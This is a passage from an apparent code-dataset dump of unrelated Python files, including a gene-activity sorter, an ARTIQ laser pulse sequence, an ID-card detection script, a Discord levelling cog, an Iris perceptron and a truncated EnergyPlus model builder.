'r')\nwith open('Allgenes_activity.tsv') as f:\n    next(f) #skips headings\n    reader = csv.reader(f, delimiter = '\\t')\n    for name, gene, bloodc_act, bloodh_act, breastc_act, breasth_act, liverc_act, liverh_act, pancreasc_act, pancreash_act in reader:\n        if(bloodc_act == 'on'):\n            Blood_cancer[name] = gene\n        if(bloodh_act == 'on'):\n            Blood_healthy[name] = gene\n        if(breastc_act == 'on'):\n            Breast_cancer[name] = gene\n        if(breasth_act == 'on'):\n            Breast_healthy[name] = gene\n        if(liverc_act == 'on'):\n            Liver_cancer[name] = gene\n        if(liverh_act == 'on'):\n            Liver_healthy[name] = gene\n        if(pancreasc_act == 'on'):\n            Pancreas_cancer[name] = gene\n        if(pancreash_act == 'on'):\n            Pancreas_Healthy[name] = gene\n\nw = csv.writer(open(\"Blood_Cancer.tsv\", \"w\"))\nfor key, val in Blood_cancer.items():\n    w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Blood_Healthy.tsv\", \"w\"))\nfor key, val in Blood_healthy.items():\n    w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Breast_Cancer.tsv\", \"w\"))\nfor key, val in Breast_cancer.items():\n    w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Breast_Healthy.tsv\", \"w\"))\nfor key, val in Breast_healthy.items():\n    w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Liver_Cancer.tsv\", \"w\"))\nfor key, val in Liver_cancer.items():\n    w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Liver_Healthy.tsv\", \"w\"))\nfor key, val in Liver_healthy.items():\n    w.writerow([key + '\\t' + val])\n\nw = 
csv.writer(open(\"Pancreas_Cancer.tsv\", \"w\"))\nfor key, val in Pancreas_cancer.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Pancreas_Healthy.tsv\", \"w\"))\nfor key, val in Pancreas_Healthy.items():\n w.writerow([key + '\\t' + val])\n","sub_path":"Sorting_script.py","file_name":"Sorting_script.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"333881817","text":"from artiq.experiment import *\nimport numpy as np\nfrom artiq.coredevice.ad9910 import PHASE_MODE_TRACKING, PHASE_MODE_ABSOLUTE\n\nclass RabiExcitation:\n freq_729=\"Excitation_729.rabi_excitation_frequency\"\n amp_729=\"Excitation_729.rabi_excitation_amplitude\"\n att_729=\"Excitation_729.rabi_excitation_att\"\n phase_729=\"Excitation_729.rabi_excitation_phase\"\n channel_729=\"Excitation_729.channel_729\"\n duration=\"Excitation_729.rabi_excitation_duration\"\n line_selection=\"Excitation_729.line_selection\"\n sp_amp_729=\"Excitation_729.single_pass_amplitude\"\n sp_att_729=\"Excitation_729.single_pass_att\"\n #detuning = \"RabiFlopping.detuning\"\n \n phase_ref_time=np.int64(-1)\n ramp_has_been_programmed= False # always initialize to False; gets set to True inside setup_ramping\n\n @kernel\n def setup_ramping(self):\n # This function programs the appropriate ramp into the DDS memory.\n #\n # If a PulseSequence wants to use ramping, call setup_ramping() inside \n # its set_subsequence function.\n # To disable ramping for a PulseSequence, the easiest way to do this is\n # comment or remove the call to setup_ramping() in the set_subsequence function.\n r = RabiExcitation \n self.get_729_dds(r.channel_729)\n self.prepare_pulse_with_amplitude_ramp(\n pulse_duration=r.duration,\n ramp_duration=25.0*us,\n dds1_amp=r.amp_729)\n r.ramp_has_been_programmed = True\n print('is ramp set?')\n\n def subsequence(self):\n r = RabiExcitation\n self.get_729_dds(r.channel_729)\n\n if r.ramp_has_been_programmed:\n self.dds_729.set(r.freq_729,\n amplitude=0.,\n ref_time_mu=r.phase_ref_time)\n else:\n self.dds_729.set(r.freq_729,\n amplitude=r.amp_729,\n ref_time_mu=r.phase_ref_time)\n self.dds_729.set_att(r.att_729)\n\n sp_freq_729 = 80*MHz + self.get_offset_frequency(r.channel_729)+ 0*3.21022*MHz\n self.dds_729_SP.set(sp_freq_729, amplitude=r.sp_amp_729, \n phase=r.phase_729 / 360., ref_time_mu=r.phase_ref_time)\n self.dds_729_SP.set_att(r.sp_att_729)\n # print(\"dp: \", r.frereq_729)\n # print(\"sp: \", sp_fq_729)\n if r.ramp_has_been_programmed:\n self.dds_729_SP.sw.on()\n self.execute_pulse_with_amplitude_ramp(\n dds1_att=r.att_729,\n dds1_freq=r.freq_729)\n \n #self.dds_729_SP.sw.off()\n else:\n with parallel:\n self.dds_729.sw.on()\n self.dds_729_SP.sw.on()\n delay(r.duration)\n with parallel:\n self.dds_729.sw.off()\n self.dds_729_SP.sw.off()","sub_path":"sequences/subsequences/rabi_excitation.py","file_name":"rabi_excitation.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"231599638","text":"\nimport numpy as np\n\n\ndef softmax(a):\n c = np.max(a)\n print('softmax c :', c)\n exp_a = np.exp(a-c) # 자연상수 e 지수함수로 변환\n print('exp_a :', exp_a)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\n# e100 은 0 dl 40 개가 넘는 큰값\ndef softmax1(a):\n c = np.max(a)\n print('softmax1 c :', c)\n exp_a = np.exp(a) # overflow 대비책\n print('exp_a :', exp_a)\n\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\na 
= np.array([0.3, 2.9, 4.0])\n#a= np.array([1010, 1000, 990])\n\ny = softmax(a)\ny1= softmax1(a)\n\n# Meaning of the softmax result\n# 1) probabilities\n# 2) the relative order of the elements is unchanged: exp is a monotonically increasing function\n\n\nprint( \"Softmax Result :\", y)\nprint( \"SUM : \" , np.sum(y))\nprint( \"Softmax1 Result :\", y1)\nprint( \"SUM : \" , np.sum(y1))","sub_path":"MLPerceptron/Softmax_test.py","file_name":"Softmax_test.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"277504231","text":"\n# Import packages\nfrom utils import visualization_utils as vis_util\nfrom utils import label_map_util\nimport traceback\nimport argparse\nimport os\nimport cv2\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nimport sys\n\nfrom PIL import Image\n\n\ndef get_images(img_path):\n    files = []\n    exts = ['jpg', 'png', 'jpeg', 'JPG']\n    if os.path.isfile(img_path):\n        for ext in exts:\n            if img_path.endswith(ext):\n                files.append(img_path)\n    else:\n        for parent, _, filenames in os.walk(img_path):\n            for filename in filenames:\n                for ext in exts:\n                    if filename.endswith(ext):\n                        files.append(os.path.join(parent, filename))\n                        break\n    print('Found {} images'.format(len(files)))\n    return files\n\n\ndef argument_parser():\n    parser = argparse.ArgumentParser(\n        description=\"Detecting and cropping ID card from image\")\n    parser.add_argument(\n        '--img', help=\"Image file or directory to be processed\", action=\"store\", default=\"test_images\")\n\n    parser.add_argument(\n        \"--output_dir\", help=\"Output directory for cropped image\", action=\"store\", default=\"output\")\n\n    return parser.parse_args()\n    # This is needed since the notebook is stored in the object_detection folder.\n\n\nsys.path.append(\"..\")\n\nargs = argument_parser()\n\n# Import utilities\n\n# Name of the directory containing the object detection module we're using\nCWD_PATH = os.getcwd()\n\nMODEL_NAME = 'model'\nIMAGE_NAME = args.img\nIMAGE_EXTS = ['gif', 'jpg', 'png', 'jpeg', 'tiff']\nOUTPUT_DIR = os.path.join(CWD_PATH, args.output_dir)\n\n# Grab path to current working directory\n\n# Path to frozen detection graph .pb file, which contains the model that is used\n# for object detection.\nPATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME, 'frozen_inference_graph.pb')\n\n# Path to label map file\nPATH_TO_LABELS = os.path.join(CWD_PATH, 'data', 'labelmap.pbtxt')\n\n# Path to image\nPATH_TO_IMAGE = os.path.join(CWD_PATH, IMAGE_NAME)\n\n# Number of classes the object detector can identify\nNUM_CLASSES = 1\n\n# Load the label map.\n# Label maps map indices to category names, so that when our convolution\n# network predicts `5`, we know that this corresponds to `king`.\n# Here we use internal utility functions, but anything that returns a\n# dictionary mapping integers to appropriate string labels would be fine\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(\n    label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n# Load the Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n    od_graph_def = tf.GraphDef()\n    with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n        serialized_graph = fid.read()\n        od_graph_def.ParseFromString(serialized_graph)\n        tf.import_graph_def(od_graph_def, name='')\n\n    sess = tf.Session(graph=detection_graph)\n\n# Define input and output tensors (i.e. 
data) for the object detection classifier\n\n# Input tensor is the image\nimage_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n\n# Output tensors are the detection boxes, scores, and classes\n# Each box represents a part of the image where a particular object was detected\ndetection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n\n# Each score represents level of confidence for each of the objects.\n# The score is shown on the result image, together with the class label.\ndetection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\ndetection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n\n# Number of objects detected\nnum_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n# Remove output dir\nif os.path.isdir(OUTPUT_DIR):\n    shutil.rmtree(OUTPUT_DIR)\nos.makedirs(OUTPUT_DIR)\n\nimages = get_images(PATH_TO_IMAGE)\n\n\nfor image_fn in images:\n    try:\n        print(f\"running images {image_fn}\")\n        # Load image using OpenCV and\n        # expand image dimensions to have shape: [1, None, None, 3]\n        # i.e. a single-column array, where each item in the column has the pixel RGB value\n        image = cv2.imread(image_fn)\n\n        image_expanded = np.expand_dims(image, axis=0)\n\n        # Perform the actual detection by running the model with the image as input\n        (boxes, scores, classes, num) = sess.run(\n            [detection_boxes, detection_scores, detection_classes, num_detections],\n            feed_dict={image_tensor: image_expanded})\n\n        # print(\"confidence scores\", scores.shape, boxes.shape, classes.shape)\n        # Draw the results of the detection (aka 'visualize the results')\n        image, array_coord, box_to_display_str_map = vis_util.visualize_boxes_and_labels_on_image_array(\n            image,\n            np.squeeze(boxes),\n            np.squeeze(classes).astype(np.int32),\n            np.squeeze(scores),\n            category_index,\n            use_normalized_coordinates=True,\n            line_thickness=3,\n            min_score_thresh=0.60)\n\n        ymin, xmin, ymax, xmax = array_coord\n\n        for key, value in box_to_display_str_map.items():\n            print(\"box to display str map\", key, value)\n        shape = np.shape(image)\n        im_width, im_height = shape[1], shape[0]\n        (left, right, top, bottom) = (xmin * im_width,\n                                      xmax * im_width, ymin * im_height, ymax * im_height)\n\n        # Using Image to crop and save the extracted copied image\n        output_path = os.path.join(OUTPUT_DIR, os.path.basename(image_fn))\n        print(f\"output dir {output_path}\")\n        im = Image.open(image_fn)\n        im.crop((left, top, right, bottom)).save(output_path, quality=95)\n    except Exception as e:\n        traceback.print_exc()\n        print(\"exception found for image\", image_fn)\n        continue\n","sub_path":"id_card_detection_image.py","file_name":"id_card_detection_image.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"658123","text":"# Load dependencies\nimport pymongo\n\n# Create the connection\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\n# Point to the database mongo_python and the collection sites\n##use mongo_python\nmp = myclient[\"mongo_python\"]\n\nsites = mp[\"sites\"]\n\nret = sites.update_one({\"alexa\": \"12345\"}, {\"$set\": {\"alexa\": \"10000\"}})\n\nprint(ret)\n","sub_path":"mydb/pymongo_updateone.py","file_name":"pymongo_updateone.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"52050296","text":"\"\"\"\nLists the files in a directory tree using recursion\n\"\"\"\n\nimport sys, os\n\n\ndef mylister(currdir):\n    print('[' + 
currdir + ']')\n for file in os.listdir(currdir):\n path = os.path.join(currdir, file)\n if not os.path.isdir(path):\n print(path)\n else:\n mylister(path)\n\n\nif __name__ == '__main__':\n mylister(sys.argv[1])","sub_path":"PP4E/System/Filetools/lister_recur.py","file_name":"lister_recur.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"633101270","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport argparse\nimport glob\nimport json\nimport sys\n\nimport sh\n\nfrom analyzers import utils\n\n\nclass PylintAnalyzer(object):\n \"\"\"\n Pylint runner.\n Specify parameters such as project folders, config file for code report tool.\n For example:\n universum_pylint --python-version 2 --files *.py tests/\n ./pylint.py --python-version 2 --files *.py tests/\n Output: json of the found issues in the code.\n \"\"\"\n\n @staticmethod\n def define_arguments():\n parser = argparse.ArgumentParser(description=\"Pylint analyzer\")\n parser.add_argument(\"--files\", dest=\"file_list\", nargs='+', help=\"Python files and Python packages for Pylint.\")\n parser.add_argument(\"--rcfile\", dest=\"rcfile\", help=\"Specify a configuration file.\")\n parser.add_argument(\"--python-version\", dest=\"version\", default=\"3\", choices=[\"2\", \"3\"],\n help=\"Version of Python\")\n utils.add_common_arguments(parser)\n return parser\n\n def __init__(self, settings):\n self.settings = settings\n self.json_file = settings.result_file\n\n def execute(self):\n if not self.settings.file_list:\n sys.stderr.write(\"Please, specify [--files] option. Files could be defined as a single python file,\"\n \" *.py or directories with __init__.py file in the directory.\\n\")\n return 2\n\n issues = []\n files = []\n if not self.settings.rcfile:\n self.settings.rcfile = \"\"\n\n for pattern in self.settings.file_list:\n files.extend(glob.glob(pattern))\n try:\n if self.settings.version == \"3\":\n cmd = sh.Command(\"python3\")\n else:\n cmd = sh.Command(\"python2\")\n issues = cmd(\"-m\", \"pylint\", \"-f\", \"json\", \"--rcfile=\" + self.settings.rcfile, *files).stdout\n except sh.CommandNotFound as e:\n sys.stderr.write(\"No such file or command as '\" + str(e) + \"'. 
\"\n \"Make sure, that required code report tool is installed.\\n\")\n except Exception as e:\n if e.stderr and not e.stdout:\n sys.stderr.write(e.stderr)\n return 2\n elif e.stdout:\n issues = e.stdout\n\n try:\n issues_loads = []\n loads = []\n if issues:\n loads = json.loads(issues)\n for issue in loads:\n # pylint has its own escape rules for json output of \"message\" values.\n # it uses cgi.escape lib and escapes symbols <>&\n issue[\"message\"] = issue[\"message\"].replace(\"<\", \"<\").replace(\">\", \">\").replace(\"&\", \"&\")\n issues_loads.append(issue)\n utils.analyzers_output(self.json_file, issues_loads)\n if issues_loads:\n return 1\n except ValueError as e:\n sys.stderr.write(e.message)\n sys.stderr.write(\"The following string produced by the pylint launch cannot be parsed as JSON:\\n\")\n sys.stderr.write(issues)\n return 2\n return 0\n\n\ndef form_arguments_for_documentation():\n return PylintAnalyzer.define_arguments()\n\n\ndef main():\n analyzer_namespace = PylintAnalyzer.define_arguments().parse_args()\n analyze = PylintAnalyzer(analyzer_namespace)\n return analyze.execute()\n\n\nif __name__ == \"__main__\":\n exit_code = main()\n sys.exit(exit_code)\n","sub_path":"analyzers/pylint.py","file_name":"pylint.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"383528325","text":"\n\"\"\"\nRuntime: 40 ms, faster than 76.20% of Python3 online submissions for Count and Say.\nMemory Usage: 13 MB, less than 5.11% of Python3 online submissions for Count and Say.\n\"\"\"\nclass Solution:\n def countAndSay(self, n: int) -> str:\n ans = [\"1\"]\n for i in range(n-1):\n ans.append(self.cntsay(ans[-1]))\n return ans[-1]\n\n def cntsay(self, string):\n n = len(string)\n i = 0\n num = 1\n res = \"\"\n while i < n:\n num = 1\n tmp = string[i]\n while i + 1 < n and string[i + 1] == tmp:\n num += 1\n i += 1\n continue\n res += str(num) + tmp\n i += 1\n return res\n\n\na = Solution();\nfor i in range(1, 7):\n b = a.countAndSay(i)\n print(b)","sub_path":"30 Count and Say.py","file_name":"30 Count and Say.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"184825120","text":"from dataclasses import dataclass\r\nfrom task import Task\r\n\r\n@dataclass()\r\nclass Thread:\r\n time_work: int = None\r\n task_type: int = None\r\n idle: bool = True\r\n\r\nclass Processor():\r\n def __init__(self): \r\n self.p = Thread()\r\n \r\n def add_task(self, task: Task):\r\n if self.p.task_type < task.get_type():\r\n l = Task()\r\n l.set_type(task.get_type())\r\n l.set_time(task.get_time())\r\n stack.add_item(l)\r\n self.p.time_work = task.get_time()\r\n self.p.task_type = task.get_type()\r\n elif self.idle_proc():\r\n self.p.time_work = task.get_time()\r\n self.p.task_type = task.get_type()\r\n else:\r\n stack.add_item(task)\r\n\r\n def __task_perform_p(self):\r\n self.p.time_work -= 1\r\n if self.p.time_work <= 0:\r\n self.p.idle = True\r\n self.p_task_type = None\r\n\r\n def __str__(self):\r\n string = \"|proc|type|time|idle|\"\r\n if not self.p.idle:\r\n string += \"\\n|1 |{:<4}|{:<4}|{:<4}|\".format(str(self.p.task_type), str(self.p.time_work), str(self.p.idle))\r\n else:\r\n string += \"\\n|1 |None|None|True|\"\r\n return string\r\n\r\n def work(self):\r\n if not self.p.idle:\r\n self.__task_perform_p()\r\n else:\r\n self.p.idle = True\r\n\r\n def idle_proc(self):\r\n return 
self.p.idle","sub_path":"processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"300248753","text":"# *Problem 1*\n# Handle the exception thrown by the code below by using try and except blocks. Display a meaningful message.\n#\n# for i in ['a','b','c']:\n# print(i**2)\n# ---------------------------------------------------------------------------\n# TypeError Traceback (most recent call last)\n# <ipython-input-1-908335551eea> in <module>()\n# 1 for i in ['a','b','c']:\n# ----> 2 print i**2\n#\n# TypeError: unsupported operand type(s) for ** or pow(): 'str' and 'int'\n\n# try:\n# for i in ['a','b','c']:\n# print()\n\n# *Problem 2*\n# # Handle the exception thrown by the code below by using try and except blocks. Then use a finally block to print('All Done.')\n\n# x = 5\n# y = 0\n#\n# z = x/y\n# ---------------------------------------------------------------------------\n# ZeroDivisionError Traceback (most recent call last)\n# <ipython-input-2-3effb78be709> in <module>()\n# 2 y = 0\n# 3\n# ----> 4 z = x/y\n#\n# ZeroDivisionError: integer division or modulo by zero\n\n# *Problem 3*\n# Write a function that asks for an integer and prints the square of it. Use a while loop with a try,except, else block to account for incorrect inputs.\n#\n# def ask():\n# *# STUDENTS, YOU FILL OUT THE FUNCTION LIKE WE DID IN CLASS THAT WILL PROMPT AND RESPOND AS FOLLOWS #*\n#\n# Input an integer: crappy_entry\n# An error occurred! Please try again!\n# Input an integer: 2\n# Thank you, you number squared is: 4\n\n\ndef ask():\n\n while True:\n try:\n n = int(input('Input an Integer: '))\n except:\n print ('An error occurred! Please try agian!')\n continue\n else:\n break\n return n\n\nprint('Thank you, your number squared is: ', ask()**2)","sub_path":"exceptionsHomework.py","file_name":"exceptionsHomework.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"515517983","text":"# ID: 2021220699\n# NAME: Eunchan Lee \n# File name: hw02-2.py\n# Platform: Python 3.7 on Windows 10 Spyder4\n# Required Package(s): numpy pandas matplotlib scikit-learn\n\n\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\n\nclass Perceptron:\n \"\"\"\n Perceptron neuron\n \"\"\"\n\n def __init__(self, learning_rate=0.1):\n \"\"\"\n instantiate a new Perceptron\n\n :param learning_rate: coefficient used to tune the model\n response to training data\n \"\"\"\n self.learning_rate = learning_rate\n self._b = 0.0 # y-intercept\n self._w = None # weights assigned to input features\n # count of errors during each iteration\n self.misclassified_samples = []\n\n def fit(self, x: np.array, y: np.array, n_iter=10):\n \"\"\"\n fit the Perceptron model on the training data\n\n :param x: samples to fit the model on\n :param y: labels of the training samples\n :param n_iter: number of training iterations \n \"\"\"\n self._b = 0.0\n self._w = np.zeros(x.shape[1])\n self.misclassified_samples = []\n\n for _ in range(n_iter):\n # counter of the errors during this training iteration\n errors = 0\n for xi, yi in zip(x, y):\n # for each sample compute the update value\n update = self.learning_rate * (yi - self.predict(xi))\n # and apply it to the y-intercept and weights array\n self._b += update\n self._w += update * xi\n errors += int(update != 
0.0)\n\n            self.misclassified_samples.append(errors)\n\n    def f(self, x: np.array) -> float:\n        \"\"\"\n        compute the output of the neuron\n        :param x: input features\n        :return: the output of the neuron\n        \"\"\"\n        return np.dot(x, self._w) + self._b\n\n    def predict(self, x: np.array):\n        \"\"\"\n        convert the output of the neuron to a binary output\n        :param x: input features\n        :return: 1 if the output for the sample is positive (or zero),\n                 -1 otherwise\n        \"\"\"\n        return np.where(self.f(x) >= 0, 1, -1)\n\nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\n# download and convert the csv into a DataFrame\ndf = pd.read_csv(url, header=None)\ndf.head()\n\n\n'''\n\ndataset info \n\n-X label\n: 4 features \n\n-Y label \n0~50: Iris-Setosa\n51~100: Iris-Versicolour\n101~150: Iris-Virginica\n\n\nhw2-1.py => Setosa vs Virginica -> 0~50 + 100~150\nhw2-2.py => Versicolour vs Virginica -> 50~100 +100~150\n\n'''\n\n\n# extract the label column\ny = df.iloc[:, 4].values\n# extract features\nx = df.iloc[:, 0:4].values\n\n\n#Concat for Versicolour vs Virginica\ny= np.concatenate([y[50:100],y[100:150]])\nx= np.concatenate([x[50:100],x[100:150]])\n\n\n\nfrom sklearn.model_selection import train_test_split\n\n# map the labels to a binary integer value\n# Versicolour(1) or Virginica(-1)\ny = np.where(y == 'Iris-versicolor', 1, -1)\n\n\n# standardization of the input features\nplt.hist(x[:, 0], bins=100)\nplt.title(\"Features before standardization\")\nplt.savefig(\"./before.png\", dpi=300)\nplt.show()\n\n#standardization\nx[:, 0] = (x[:, 0] - x[:, 0].mean()) / x[:, 0].std()\nx[:, 1] = (x[:, 1] - x[:, 1].mean()) / x[:, 1].std()\nx[:, 2] = (x[:, 2] - x[:, 2].mean()) / x[:, 2].std()\nx[:, 3] = (x[:, 3] - x[:, 3].mean()) / x[:, 3].std()\n\nplt.hist(x[:, 0], bins=100)\nplt.title(\"Features after standardization\")\nplt.show()\n\n# split the data\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25,\n                                                    random_state=0)\n\n# train the model\nclassifier = Perceptron(learning_rate=0.01)\nclassifier.fit(x_train, y_train)\n\n# plot the number of errors during each iteration\nplt.plot(range(1, len(classifier.misclassified_samples) + 1),\n         classifier.misclassified_samples, marker='o')\nplt.xlabel('Epoch')\nplt.ylabel('Errors')\nplt.show()\n\n#Accuracy \nfrom sklearn.metrics import accuracy_score\nprint(\"accuracy %f\" % accuracy_score(classifier.predict(x_test), y_test))\n","sub_path":"ISP/week2/hw02-2.py","file_name":"hw02-2.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"479505399","text":"import discord, random\nfrom discord.ext import commands\n\ndef _get_level_xp(n):\n    return 5 * (n ** 2) + 50 * n + 100\n\n\ndef _get_level_from_xp(xp):\n    remaining_xp = int(xp)\n    level = 0\n    while remaining_xp >= _get_level_xp(level):\n        remaining_xp -= _get_level_xp(level)\n        level += 1\n    return level\n\nclass ListenerCog(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self.guild_id = 257554742371155998\n\n    async def check_and_add_roles(self, member: discord.Member):\n        level = _get_level_from_xp(self.bot.ranks[member.id])\n        try:\n            info = self.bot.level_roles[level]\n            guild = self.bot.get_guild(self.guild_id)\n            role = guild.get_role(info)\n            await member.add_roles(role, reason = \"Automatically done for levelling up.\")\n        except:\n            return\n\n    @commands.Cog.listener()\n    async def on_message(self, message):\n        if message.channel.id in self.bot.blacklist or message.guild.id != 
257554742371155998:\n return\n if not message.author.bot:\n self.bot.ranks[message.author.id] += random.randrange(1, 6)\n await self.check_and_add_roles(message.author)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n await self.bot.db.execute(\"INSERT OR IGNORE INTO ranks(userId) VALUES(?)\", (member.id,))\n cursor = await self.bot.db.execute(\"SELECT * FROM ranks WHERE userId = ?\", (member.id,))\n row = await cursor.fetchone()\n\n self.bot.ranks.update({row[0]: row[1]})\n\ndef setup(bot):\n bot.add_cog(ListenerCog(bot))\n","sub_path":"cogs/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"464739654","text":"import logging\nfrom pyidf import ValidationLevel\nimport pyidf\nfrom pyidf.idf import IDF\n\nidf_file_path = r\"Exercise1A.idf\"\n\n\nif __name__ == '__main__':\n\n logging.info(\"start\")\n pyidf.validation_level = ValidationLevel.transition\n idf = IDF()\n\n obj1 = IDF._create_datadict(\"Version\")\n obj1[\"Version Identifier\"] = \"8.4\"\n idf.add(obj1)\n\n obj2 = IDF._create_datadict(\"Building\")\n obj2[\"Name\"] = \"Exercise 1A\"\n obj2[\"North Axis\"] = 0.0\n obj2[\"Terrain\"] = \"Country\"\n obj2[\"Loads Convergence Tolerance Value\"] = 0.04\n obj2[\"Temperature Convergence Tolerance Value\"] = 0.4\n obj2[\"Solar Distribution\"] = \"FullInteriorAndExterior\"\n obj2[\"Maximum Number of Warmup Days\"] = None\n obj2[\"Minimum Number of Warmup Days\"] = 6\n idf.add(obj2)\n\n obj3 = IDF._create_datadict(\"Timestep\")\n obj3[\"Number of Timesteps per Hour\"] = 4\n idf.add(obj3)\n\n obj4 = IDF._create_datadict(\"SurfaceConvectionAlgorithm:Inside\")\n obj4[\"Algorithm\"] = \"TARP\"\n idf.add(obj4)\n\n obj5 = IDF._create_datadict(\"SurfaceConvectionAlgorithm:Outside\")\n obj5[\"Algorithm\"] = \"TARP\"\n idf.add(obj5)\n\n obj6 = IDF._create_datadict(\"HeatBalanceAlgorithm\")\n obj6[\"Algorithm\"] = \"ConductionTransferFunction\"\n idf.add(obj6)\n\n obj7 = IDF._create_datadict(\"ShadowCalculation\")\n obj7[\"Calculation Method\"] = \"AverageOverDaysInFrequency\"\n obj7[\"Calculation Frequency\"] = 20\n idf.add(obj7)\n\n obj8 = IDF._create_datadict(\"SimulationControl\")\n obj8[\"Do Zone Sizing Calculation\"] = \"No\"\n obj8[\"Do System Sizing Calculation\"] = \"No\"\n obj8[\"Do Plant Sizing Calculation\"] = \"No\"\n obj8[\"Run Simulation for Sizing Periods\"] = \"Yes\"\n obj8[\"Run Simulation for Weather File Run Periods\"] = \"No\"\n idf.add(obj8)\n\n obj9 = IDF._create_datadict(\"Site:Location\")\n obj9[\"Name\"] = \"CHICAGO_IL_USA TMY2-94846\"\n obj9[\"Latitude\"] = 41.78\n obj9[\"Longitude\"] = -87.75\n obj9[\"Time Zone\"] = -6.0\n obj9[\"Elevation\"] = 190.0\n idf.add(obj9)\n\n obj10 = IDF._create_datadict(\"SizingPeriod:DesignDay\")\n obj10[\"Name\"] = \"CHICAGO_IL_USA Cooling .4% Conditions DB=>MWB\"\n obj10[\"Month\"] = 7\n obj10[\"Day of Month\"] = 21\n obj10[\"Day Type\"] = \"SummerDesignDay\"\n obj10[\"Maximum Dry-Bulb Temperature\"] = 32.8\n obj10[\"Daily Dry-Bulb Temperature Range\"] = 10.9\n obj10[\"Dry-Bulb Temperature Range Modifier Type\"] = None\n obj10[\"Dry-Bulb Temperature Range Modifier Day Schedule Name\"] = None\n obj10[\"Humidity Condition Type\"] = \"Wetbulb\"\n obj10[\"Wetbulb or DewPoint at Maximum Dry-Bulb\"] = 23.6\n obj10[\"Humidity Condition Day Schedule Name\"] = None\n obj10[\"Humidity Ratio at Maximum Dry-Bulb\"] = None\n obj10[\"Enthalpy at Maximum Dry-Bulb\"] = None\n obj10[\"Daily Wet-Bulb 
Temperature Range\"] = None\n obj10[\"Barometric Pressure\"] = 99063.21\n obj10[\"Wind Speed\"] = 0.0\n obj10[\"Wind Direction\"] = 0.0\n obj10[\"Rain Indicator\"] = \"No\"\n obj10[\"Snow Indicator\"] = \"No\"\n obj10[\"Daylight Saving Time Indicator\"] = \"No\"\n obj10[\"Solar Model Indicator\"] = \"ASHRAEClearSky\"\n obj10[\"Beam Solar Day Schedule Name\"] = None\n obj10[\"Diffuse Solar Day Schedule Name\"] = None\n obj10[\"ASHRAE Clear Sky Optical Depth for Beam Irradiance (taub)\"] = None\n obj10[\n \"ASHRAE Clear Sky Optical Depth for Diffuse Irradiance (taud)\"] = None\n obj10[\"Sky Clearness\"] = 1.0\n idf.add(obj10)\n\n obj11 = IDF._create_datadict(\"SizingPeriod:DesignDay\")\n obj11[\"Name\"] = \"CHICAGO_IL_USA Heating 99.6% Conditions\"\n obj11[\"Month\"] = 1\n obj11[\"Day of Month\"] = 21\n obj11[\"Day Type\"] = \"WinterDesignDay\"\n obj11[\"Maximum Dry-Bulb Temperature\"] = -21.2\n obj11[\"Daily Dry-Bulb Temperature Range\"] = 0.0\n obj11[\"Dry-Bulb Temperature Range Modifier Type\"] = None\n obj11[\"Dry-Bulb Temperature Range Modifier Day Schedule Name\"] = None\n obj11[\"Humidity Condition Type\"] = \"Wetbulb\"\n obj11[\"Wetbulb or DewPoint at Maximum Dry-Bulb\"] = -21.2\n obj11[\"Humidity Condition Day Schedule Name\"] = None\n 